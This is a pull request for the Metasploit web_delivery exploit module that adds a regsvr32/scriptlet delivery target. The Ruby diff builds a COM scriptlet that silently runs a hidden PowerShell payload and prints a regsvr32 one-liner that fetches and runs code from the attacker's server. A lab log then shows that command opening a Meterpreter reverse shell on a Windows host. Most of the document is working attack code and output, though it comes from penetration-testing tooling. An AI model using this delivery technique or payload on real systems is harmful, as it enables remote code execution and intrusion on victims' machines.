### PR TITLE
Add regsvr32_command_delivery_server feature into web_delivery

### DIFF
--- a/documentation/modules/exploit/multi/script/web_delivery.md
+++ b/documentation/modules/exploit/multi/script/web_delivery.md
@@ -26,7 +26,7 @@ At that point, you would use the web_delivery module like in the following examp
 msf exploit(web_delivery) > run
 [*] Exploit running as background job.
 
-[*] Started reverse TCP handler on 172.16.23.1:4444 
+[*] Started reverse TCP handler on 172.16.23.1:4444
 msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/z5inGkwCCQiz9
 [*] Local IP: http://10.6.0.86:8080/z5inGkwCCQiz9
 [*] Server started.
@@ -52,6 +52,11 @@ PHP is a fairly popular language for web servers, especially Apache.
 Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2
 are the first Windows versions to come with Powershell by default. Older Windows systems such as XP
 don't come with it by default, but it is still possible to see it installed on a corporate network.
+
+**Regsvr32/Windows**
+
+A scriptlet is a component for the Web. They are a standard feature of Internet Explorer 4.0. As designed, Scriptlets combine the benefits of component programming with Dynamic HTML and script. The consequences of this combination, however, transcend the Web. Regsvr32.exe can register a scriptlet, and execute the code.
+
 
 ## Scenarios
 

--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -31,7 +31,11 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           'Andrew Smith "jakx" <jakx.ppr@gmail.com>',
           'Ben Campbell',
-          'Chris Campbell' # @obscuresec - Inspiration n.b. no relation!
+          'Chris Campbell', # @obscuresec - Inspiration n.b. no relation!
+          'Casey Smith',
+          'Trenton Ivey',
+          'mubix',
+          'Nixawk'
         ],
       'DefaultOptions' =>
         {
@@ -42,7 +46,8 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
           ['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
           ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
-          ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
+          ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'],
+          ['URL', 'http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html']
         ],
       'Platform'       => %w(python php win),
       'Targets'        =>
@@ -56,6 +61,10 @@ class MetasploitModule < Msf::Exploit::Remote
             'Arch' => ARCH_PHP
           }],
           ['PSH', {
+            'Platform' => 'win',
+            'Arch' => [ARCH_X86, ARCH_X86_64]
+          }],
+          ['SCT', {
             'Platform' => 'win',
             'Arch' => [ARCH_X86, ARCH_X86_64]
           }]
@@ -73,10 +82,33 @@ class MetasploitModule < Msf::Exploit::Remote
                              remove_comspec: true,
                              exec_in_place: true
                            )
+    elsif target.name.include? 'SCT'
+      data = cmd_psh_payload(payload.encoded,
+                            payload_instance.arch.first,
+                            remove_comspec: true,
+                            use_single_quotes: true
+                           )
+      command = "powershell.exe -nop -w hidden -c #{data}"
+
+      # generate valid COM Scriptlets (.sct files)
+      rand_class_id = "#{Rex::Text.rand_text_hex 8}-"
+      rand_class_id << "#{Rex::Text.rand_text_hex 4}-"
+      rand_class_id << "#{Rex::Text.rand_text_hex 4}-"
+      rand_class_id <<"#{Rex::Text.rand_text_hex 4}-"
+      rand_class_id << "#{Rex::Text.rand_text_hex 12}"
+
+      data = %{<?XML version="1.0"?>
+        <scriptlet>
+        <registration progid="#{Rex::Text.rand_text_alphanumeric 8}" classid="{#{rand_class_id}}">
+        <script>
+        <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]>
+        </script>
+        </registration>
+        </scriptlet>}
     else
       data = %Q(#{payload.encoded} )
     end
-    send_response(cli, data,  'Content-Type' => 'application/octet-stream')
+    send_response(cli, data, 'Content-Type' => 'application/octet-stream')
   end
 
   def primer
@@ -96,6 +128,8 @@ class MetasploitModule < Msf::Exploit::Remote
                                              windowstyle: 'hidden',
                                              command: download_and_run
                                            )
+    when 'SCT'
+      print_line("regsvr32 /s /n /u /i:#{get_uri} scrobj.dll")
     end
   end
 end


### PR DESCRIPTION
- http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html
- https://github.com/rapid7/metasploit-framework/pull/6969
## Verification

List the steps needed to make sure this thing works
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/script/web_delivery`
- [ ] `set target 3`
- [ ] `run`
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not

```
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /test            no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.114    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   3   SCT


msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.0.114:4444
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/test
[*] Local IP: http://192.168.0.114:8080/test
[*] Server started.
[*] Run the following command on the target machine:
regsvr32 /s /n /u /i:http://192.168.0.114:8080/test scrobj.dll
[*] 192.168.0.108    web_delivery - Delivering Payload
[*] Sending stage (983599 bytes) to 192.168.0.108
[*] Meterpreter session 1 opened (192.168.0.114:4444 -> 192.168.0.108:1162) at 2016-10-17 15:02:07 -0500

msf exploit(web_delivery) > sess 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: lab\test
meterpreter > sysinfo
Computer        : LAB
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
```
